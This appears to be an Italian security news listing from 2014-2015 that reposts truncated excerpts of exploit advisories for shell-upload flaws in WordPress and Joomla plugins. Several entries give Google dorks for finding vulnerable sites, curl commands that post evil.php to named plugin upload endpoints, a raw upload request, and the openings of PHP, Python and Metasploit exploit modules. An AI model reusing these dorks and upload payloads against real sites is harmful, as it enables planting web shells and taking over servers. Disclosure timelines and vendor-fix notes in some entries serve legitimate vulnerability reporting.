WordPress Mailcwp 1.99 Shell Upload

14 agosto 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php  doesn't check that a user is authenticated or what type of file is being uploaded any user can upload a shell to the target wordpress server:
 
  2 $message_id = $_REQUEST["message_id"];
  3 $upload_dir = $_REQUEST["upload_dir"];
.
.
...

Leggi il seguito »

Joomla Simple Image Upload 1.0 Shell Upload

13 luglio 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Version: 1.0
# Tested on: MsWin32
 
# Vuln Same to Com_Media Vulnerability
 
# Live Request :
 
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
 
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,...

Leggi il seguito »

WordPress ACF Frontend Display Shell Upload

13 luglio 2015 - Fonte: http://www.mondounix.com
+---------------------------------------------------------------------------+ 
#[+] Author: TUNISIAN CYBER 
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
#[+] Date: 3-07-2015 
#[+] Type: WebAPP 
#[+] Tested on: KaliLinux 
#[+] Friendly Sites: sec4ever.com 
#[+] Twitter: @TCYB3R 
+---------------------------------------------------------------------------+ 
 
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 
 
File Path: 
site/wp-content/uploads/uigen_YEAR/file.php 
 
Example: 
site/wp-content/uploads/uigen_2015/evil.php 
 
evil.php:...

Leggi il seguito »

WordPress N-Media Website Contact Form 1.3.4 Shell Upload

22 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
 
# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
 
# Date : 2015-04-1
 
# Dork Google: index of website-contact-form-with-file-upload
               index of /uploads/contact_files/
 
# Tested on : Linux BackBox 4.0 / curl 7.35.0
 
#####################
 
# Info :  
 
 The "upload_file()" ajax function is affected from unrestircted file upload vulnerability.
 
 
######################
 
# PoC:
 
 curl -k -X POST -F "action=upload"...

Leggi il seguito »

WordPress InBoundio Marketing Shell Upload

30 marzo 2015 - Fonte: http://www.mondounix.com
<?php
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
#     *----------------------------*      #
#  K  |....##...##..####...####....|  .   #
#  h  |....#...#........#..#...#...|  A   #
#  a  |....#..#.........#..#....#..|  N   #
#  l  |....###........##...#.....#.|  S   #
#  E  |....#.#..........#..#....#..|  e   #
#  D  |....#..#.........#..#...#...|  u   #
#  .  |....##..##...####...####....|  r   #
#     *----------------------------*      #
#-----------------------------------------#
#[ Copyright (c) 2015 | Dz Offenders Cr3w]#
#-----------------------------------------#
###########################################
#...

Leggi il seguito »

WordPress Reflex Gallery 3.1.3 Shell Upload

21 marzo 2015 - Fonte: http://www.mondounix.com
<?php
 
/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369
 
--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type...

Leggi il seguito »

WordPress WP All 3.2.3 Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-]...

Leggi il seguito »

WordPress Admin Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
...

Leggi il seguito »

WordPress Download Manager Unauthenticated File Upload

16 dicembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
    info,
    'Name'           => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
    'Description'    => %q{
      The WordPress download-manager plugin contains multiple unauthenticated file upload
      vulnerabilities which were fixed in version 2.7.5.
    },
    'Author'         =>
    [
      'Mickael Nadeau',    ...

Leggi il seguito »

WordPress WP Symposium 14.11 Shell Upload

14 dicembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27:  Discovered vulnerability
# 2014-12-01:  Vendor Notification (Twitter)
# 2014-12-02:  Vendor Notification (Web Site) 
# 2014-12-04:  Vendor Notification (E-mail)
# 2014-12-11:  No Response/Feedback
# 2014-12-11:  Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
#   if ($_FILES["file"]["error"] > 0)...

Leggi il seguito »